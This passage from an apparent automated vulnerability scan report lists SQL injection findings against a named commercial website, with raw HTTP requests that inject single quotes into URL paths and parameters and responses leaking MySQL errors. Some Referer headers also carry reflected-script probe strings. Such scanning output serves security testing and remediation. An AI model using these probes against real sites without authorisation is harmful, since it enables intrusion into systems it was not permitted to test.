Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:51 GMT
Connection: Keep-Alive
Content-Length: 27752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:52 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.92. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:44 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/?int_source=/products/accessories/international/&int_medium=bannerad&int_content=blackspace&int_campaign=powerline
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; __utmb=94003201.10.10.1303147760

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:45 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.93. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.94. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...

1.95. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.96. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.97. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:11 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.98. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.99. http://www.millerwelds.com/landing/drive/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing'/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:03:45 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 27866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.100. http://www.millerwelds.com/landing/drive/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /landing/drive'/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:04:11 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=D039342996A35FFDFB087F94CB6EE307; path=/
Content-Length: 27865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_con' at line 1)<br>
...[SNIP]...

1.101. http://www.millerwelds.com/landing/drive/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:56 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=E444AE3598B28A98BE68F16717293482; path=/
Content-Length: 14910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online&1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:58 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=9905841C246A3A99C9CE2CAD5451F256; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.102. http://www.millerwelds.com/landing/drive/ [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive'&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:43 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive''&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:44 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.103. http://www.millerwelds.com/landing/drive/ [utm_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:32 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 14985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
